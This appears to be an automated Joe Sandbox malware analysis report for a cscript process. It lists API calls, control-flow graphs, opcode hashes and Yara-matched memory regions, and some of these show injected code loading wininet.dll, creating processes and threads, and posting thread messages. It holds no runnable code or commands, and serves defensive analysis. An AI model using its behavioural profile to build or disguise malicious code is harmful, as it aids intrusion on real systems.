                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d240d28b90e1117661ef53e5b7671781a0f8c2129992a40009be141a62350b3e
                                                      • Instruction ID: e06e4dfdb8db10953dfb5ae85a4668f5454814d5f1755bbff446554bfaf50291
                                                      • Opcode Fuzzy Hash: d240d28b90e1117661ef53e5b7671781a0f8c2129992a40009be141a62350b3e
                                                      • Instruction Fuzzy Hash: 5990027220180402F140715944047560005CBD0305F55D051A5065655E875DDED67665
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e4aec9e227ecb872189d5dad5feb4fe2b6467a88d953b7d6649d2f244f3eece0
                                                      • Instruction ID: b549f27219203a72adb52f0d67a63b1fed48af6ed52807bb8fa2cd91582fb9f6
                                                      • Opcode Fuzzy Hash: e4aec9e227ecb872189d5dad5feb4fe2b6467a88d953b7d6649d2f244f3eece0
                                                      • Instruction Fuzzy Hash: B6900222211C0042F20075694C14B170005CBD0307F55D155A0155655CCA19D9626521
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 52b6d0289fed065c74b51588bf5d900c08939984f7a620f3628d251a0870db61
                                                      • Instruction ID: 1a047a3daa8a1b54f750421a55bf7cd403f569607573c549cce85c26b53e07ac
                                                      • Opcode Fuzzy Hash: 52b6d0289fed065c74b51588bf5d900c08939984f7a620f3628d251a0870db61
                                                      • Instruction Fuzzy Hash: 7590026234180442F10071594414B160005CBE1305F55D055E1065655D871DDD537126
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 8a1e8fbab471596ff6fd7195bec0ef7d16cff072c25afec1f3353d88e0ba7fe5
                                                      • Instruction ID: f143598ae6e0d91e5bbe7e8ea79f2193450d5c637d67b452eb7f8c01345b9f8c
                                                      • Opcode Fuzzy Hash: 8a1e8fbab471596ff6fd7195bec0ef7d16cff072c25afec1f3353d88e0ba7fe5
                                                      • Instruction Fuzzy Hash: 09900226211800032105B55907045170046CBD5355355D061F1016651CD725D9626121
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 6e1d792dc701db71c5ec7e5a2e73a756269cb2dffa58e9f990ea8af5baae7cb8
                                                      • Instruction ID: bf2833956bff9d013a3cee391551769fbcc8c516693fc321fa74e51c83c072ce
                                                      • Opcode Fuzzy Hash: 6e1d792dc701db71c5ec7e5a2e73a756269cb2dffa58e9f990ea8af5baae7cb8
                                                      • Instruction Fuzzy Hash: 6B90023220180802F1807159440465A0005CBD1305F95D055A0026755DCB19DB5A77A1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e4e9bdd4bca878fff6bf3342a52a370c92c47b2e2ce25cd68d74748d81044c8f
                                                      • Instruction ID: 170cb2e7530c5551192da86db247e2b0f2d258f55fed4a628ed139aec81cbf62
                                                      • Opcode Fuzzy Hash: e4e9bdd4bca878fff6bf3342a52a370c92c47b2e2ce25cd68d74748d81044c8f
                                                      • Instruction Fuzzy Hash: 1090023220584842F14071594404A560015CBD0309F55D051A0065795D9729DE56B661
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: c73e8e919663680ebbe11a61ce9aa05d202aec87f17b8ad1d11a96fa42452e49
                                                      • Instruction ID: 16ef8481e581543ef4db02415191411f2fc8254ee9c03b2254c2171b048063d7
                                                      • Opcode Fuzzy Hash: c73e8e919663680ebbe11a61ce9aa05d202aec87f17b8ad1d11a96fa42452e49
                                                      • Instruction Fuzzy Hash: 9E90026220280003610571594414626400ACBE0205B55D061E1015691DC629D9927125
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: cf5880d2dccef01da692a304c681c54e8063719acead3ef629b5f47a04419c7a
                                                      • Instruction ID: 5d149983497a77deace508264920a5dbdc61d1331ca5d171ed68536f4b847a4d
                                                      • Opcode Fuzzy Hash: cf5880d2dccef01da692a304c681c54e8063719acead3ef629b5f47a04419c7a
                                                      • Instruction Fuzzy Hash: C290023260590402F100715945147161005CBD0205F65D451A0425669D8799DA5275A2

                                                      Control-flow Graph

                                                      control_flow_graph 402 27c9080-27c90c2 call 27cbd40 405 27c919c-27c91a2 402->405 406 27c90c8-27c9118 call 27cbe10 call 27bace0 call 27c4e40 402->406 413 27c9120-27c9131 Sleep 406->413 414 27c9196-27c919a 413->414 415 27c9133-27c9139 413->415 414->405 414->413 416 27c913b-27c9161 call 27c8ca0 415->416 417 27c9163-27c9183 415->417 419 27c9189-27c918c 416->419 417->419 420 27c9184 call 27c8eb0 417->420 419->414 420->419
                                                      APIs
                                                      • Sleep.KERNELBASE(000007D0), ref: 027C9128
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: net.dll$wininet.dll
                                                      • API String ID: 3472027048-1269752229
                                                      • Opcode ID: 2a96c00c4c44193a417debe4a735e66252686fc8cee66195dde0c52a592a4e34
                                                      • Instruction ID: 1bf049c9d314082a396e0141e0137dcb4645f8aa4680ea771f4544d6534ed60d
                                                      • Opcode Fuzzy Hash: 2a96c00c4c44193a417debe4a735e66252686fc8cee66195dde0c52a592a4e34
                                                      • Instruction Fuzzy Hash: 8F318FB2500644FBC724DF74C889FB7B7B9EB48B04F20811DF62A5B244D630B610CBA8

                                                      Control-flow Graph

                                                      control_flow_graph 422 27c9076-27c90c2 call 27cbd40 426 27c919c-27c91a2 422->426 427 27c90c8-27c9118 call 27cbe10 call 27bace0 call 27c4e40 422->427 434 27c9120-27c9131 Sleep 427->434 435 27c9196-27c919a 434->435 436 27c9133-27c9139 434->436 435->426 435->434 437 27c913b-27c9161 call 27c8ca0 436->437 438 27c9163-27c9183 436->438 440 27c9189-27c918c 437->440 438->440 441 27c9184 call 27c8eb0 438->441 440->435 441->440
                                                      APIs
                                                      • Sleep.KERNELBASE(000007D0), ref: 027C9128
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: net.dll$wininet.dll
                                                      • API String ID: 3472027048-1269752229
                                                      • Opcode ID: 2e80dbdf15315df68432b7ff82cbe34a9a6752b3945dd384bf50107b656763b8
                                                      • Instruction ID: 87c7dc38262a7ef7b3a119b104f31c2cce78c3574ba72ea19e8c30f16c8dcc21
                                                      • Opcode Fuzzy Hash: 2e80dbdf15315df68432b7ff82cbe34a9a6752b3945dd384bf50107b656763b8
                                                      • Instruction Fuzzy Hash: 5731BFB2900205EBC714EF74C889BB7B7B9FB88B04F20801DE6296B245D774A510CBA5

                                                      Control-flow Graph

                                                      control_flow_graph 549 27ca662-27ca686 550 27ca68c-27ca6a1 RtlFreeHeap 549->550 551 27ca687 call 27caf60 549->551 551->550
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,027B3AF8), ref: 027CA69D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID: .z`
                                                      • API String ID: 3298025750-1441809116
                                                      • Opcode ID: 74d4561dbcc0763568b1af58ac35c0eda121a2fdf7d59f089cd1022ee91f2774
                                                      • Instruction ID: 23d463003ed5a97c82c63236c3de20acf9198e889684b490ba594dfa0a2969d4
                                                      • Opcode Fuzzy Hash: 74d4561dbcc0763568b1af58ac35c0eda121a2fdf7d59f089cd1022ee91f2774
                                                      • Instruction Fuzzy Hash: 19E06DB22046096BD718DF68DC48EE73759EF89361F108249F9599B681C630E800CAB0

                                                      Control-flow Graph

                                                      control_flow_graph 552 27ca670-27ca6a1 call 27caf60 RtlFreeHeap
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,027B3AF8), ref: 027CA69D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID: .z`
                                                      • API String ID: 3298025750-1441809116
                                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                      • Instruction ID: 38e03c0b728c311ed361da81edd71de772a834bae4924b39b08be4c75da7cb68
                                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                      • Instruction Fuzzy Hash: C4E046B2200208ABDB18EFA9CC48EA777ADEF88750F118558FE085B241C630F910CAF0

                                                      Control-flow Graph

                                                      control_flow_graph 555 27b8309-27b831f 556 27b8328-27b835a call 27cca00 call 27bace0 call 27c4e40 555->556 557 27b8323 call 27cbe60 555->557 564 27b838e-27b8392 556->564 565 27b835c-27b836e PostThreadMessageW 556->565 557->556 566 27b838d 565->566 567 27b8370-27b838b call 27ba470 PostThreadMessageW 565->567 566->564 567->566
                                                      APIs
                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 027B836A
                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 027B838B
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: eeb613ea36ea60d520cd56ddb5d2f000dc3bc4b8d6e3dc59503c010226b12c97
                                                      • Instruction ID: 9d63147205abd5e68a9484e6dd2a0ee279c9059d1eea542469b66bc2553d9724
                                                      • Opcode Fuzzy Hash: eeb613ea36ea60d520cd56ddb5d2f000dc3bc4b8d6e3dc59503c010226b12c97
                                                      • Instruction Fuzzy Hash: 1D01F571A8026877E722A6A49C06FEE772C9F00B40F15015CFB04BB1C1E694690547F6

                                                      Control-flow Graph

                                                      APIs
                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 027B836A
                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 027B838B
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: 771e945eaf44c58c09e6e8022cf52cf1e63edbb019fba50a3acfb0f830fc6881
                                                      • Instruction ID: 747780527034d85f03480bb14e18dc24dfc0cb2836980fa11a9ee3b53e753b3d
                                                      • Opcode Fuzzy Hash: 771e945eaf44c58c09e6e8022cf52cf1e63edbb019fba50a3acfb0f830fc6881
                                                      • Instruction Fuzzy Hash: 3901F271A8022877E722A6A48C06FFE772CAF00B90F14011CFF04BB1C0E6A469064BF6
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 027BAD52
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      APIs
                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 027CA734
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      APIs
                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 027CA734
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,027BF040,?,?,00000000), ref: 027C91EC
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(027C4526,?,027C4C9F,027C4C9F,?,027C4526,?,?,?,?,?,00000000,00000000,?), ref: 027CA65D
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,027BF1C2,027BF1C2,?,00000000,?,?), ref: 027CA800
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,027B8D14,?), ref: 027BF6EB
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_27b0000_cscript.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                       • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                       • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                       • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      APIs
                                                      • GetUserDefaultLCID.KERNEL32 ref: 0062AAFD
                                                        • Part of subcall function 0062AB35: GetLocaleInfoW.KERNEL32(00000000,20000070,00000000,00000002,00000000,?,0062AB0C), ref: 0062AB4B
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00630D32
                                                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005), ref: 00630D4B
                                                      • LoadStringA.USER32(000003E9,?,00000104), ref: 00630D6D
                                                      • GetModuleFileNameA.KERNEL32(?,00000104), ref: 00630DA5
                                                      • memcpy.MSVCRT ref: 00630E0E
                                                      • strcpy_s.MSVCRT ref: 00630E28
                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000060), ref: 00630E3D
                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000060), ref: 00630E55
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad$InfoLocale$DefaultFileFreeModuleNameStringUsermemcpystrcpy_s
                                                      • String ID: %s%s.DLL
                                                      • API String ID: 748293063-4110387156
                                                      APIs
                                                      • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows Script Host\Settings,00000000,00020019,?,00000000,00000000), ref: 0062750C
                                                      • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows Script Host\Settings,00000000,00020019,?), ref: 00627536
                                                      • SysFreeString.OLEAUT32(00000000), ref: 00627565
                                                      • RegCloseKey.ADVAPI32(?), ref: 00627576
                                                      • RegCloseKey.ADVAPI32(?), ref: 00627587
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,00000000,00000000,00000000,00000000), ref: 0062F7C8
                                                      • __alloca_probe_16.LIBCMT ref: 0062F7D8
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,?,?,00000000,00000000), ref: 0062F7FB
                                                      • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,00000000,00000000), ref: 0062F81E
                                                      • RegisterEventSourceW.ADVAPI32(00000000,Windows Script Host), ref: 0062F87F
                                                      • GetUserNameW.ADVAPI32(?,00000100), ref: 0062F8A1
                                                      • LookupAccountNameW.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,?), ref: 0062F8D1
                                                      • LookupAccountNameW.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,?), ref: 0062F93E
                                                      • ReportEventW.ADVAPI32(?,00000010,00000000,C0FF03E8,00000000,00000001,00000000,?,00000000), ref: 0062F9AB
                                                      • DeregisterEventSource.ADVAPI32(?), ref: 0062F9B2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: EventNameOpen$AccountByteCharCloseLookupMultiSourceWide$DeregisterFreeRegisterReportStringUser__alloca_probe_16
                                                      • String ID: LogSecurityFailures$LogSecuritySuccesses$Software\Microsoft\Windows Script Host\Settings$Windows Script Host
                                                      • API String ID: 1645720072-2261343319
                                                      APIs
                                                      • FormatMessageW.KERNEL32(00000500,?,00000000,00000000,?,00000000,?,00000000,?,00000000,0062B95E,?), ref: 0062BD1E
                                                      • SysAllocString.OLEAUT32(?), ref: 0062BD2F
                                                      • LocalFree.KERNEL32(00000000,?,00000000,0062B95E,?), ref: 0062BD51
                                                      • GetLastError.KERNEL32(?,00000000,0062B95E,?), ref: 006314B1
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,00000000,0062B95E,?), ref: 006314D8
                                                      • __alloca_probe_16.LIBCMT ref: 006314E4
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000000,00000000,00000000,?,00000000,0062B95E,?), ref: 006314FF
                                                      • FormatMessageA.KERNEL32(00000500,?,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00000000,0062B95E,?), ref: 0063151B
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,00000000,00000000,00000000,?,00000000,0062B95E,?), ref: 0063152E
                                                      • LocalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000000,0062B95E,?), ref: 00631543
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,00000000,00000000,00000000,?,00000000,0062B95E,?), ref: 0063155D
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$AllocFormatLocalMessage$ErrorFreeLastString__alloca_probe_16
                                                      • String ID:
                                                      • API String ID: 488895409-0
                                                      APIs
                                                      • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 00632698
                                                      • GetLastError.KERNEL32 ref: 006326A7
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 006326BE
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?), ref: 006326D1
                                                      • GetLastError.KERNEL32(?,00000000,00000000,00000000), ref: 006326DD
                                                      • FindClose.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 0063273C
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileFindLast$AttributesByteCharCloseFirstMultiWide
                                                      • String ID:
                                                      • API String ID: 443336949-0
                                                      APIs
                                                      • CoCreateInstance.OLE32(0062373C,00000000,00000001,006237AC,?,00000000,00000000,?), ref: 0062CDE6
                                                      • CoCreateInstance.OLE32(0062374C,00000000,00000001,006237AC,?), ref: 0062CDFA
                                                      • GetUserDefaultLCID.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00627E84,00000000), ref: 0062CE11
                                                      • CoGetClassObject.OLE32(0062376C,00000001,00000000,0062375C,?), ref: 0062CEB7
                                                      • CreateBindCtx.OLE32(00000000,00000000), ref: 0062D062
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: Create$Instance$BindClassDefaultObjectUser
                                                      • String ID: WSH$WScript
                                                      • API String ID: 1420412123-1019903269
                                                      APIs
                                                      • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,0062AA51), ref: 0062AA92
                                                      • GetProcAddress.KERNEL32(00000000,SetThreadUILanguage), ref: 0062AAA4
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,0062AA51), ref: 0062AACE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: SetThreadUILanguage$kernel32.dll
                                                      • API String ID: 145871493-927383962
                                                      APIs
                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0062DC2D
                                                      • GetCurrentProcessId.KERNEL32 ref: 0062DC3C
                                                      • GetCurrentThreadId.KERNEL32 ref: 0062DC45
                                                      • GetTickCount.KERNEL32 ref: 0062DC4E
                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 0062DC63
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
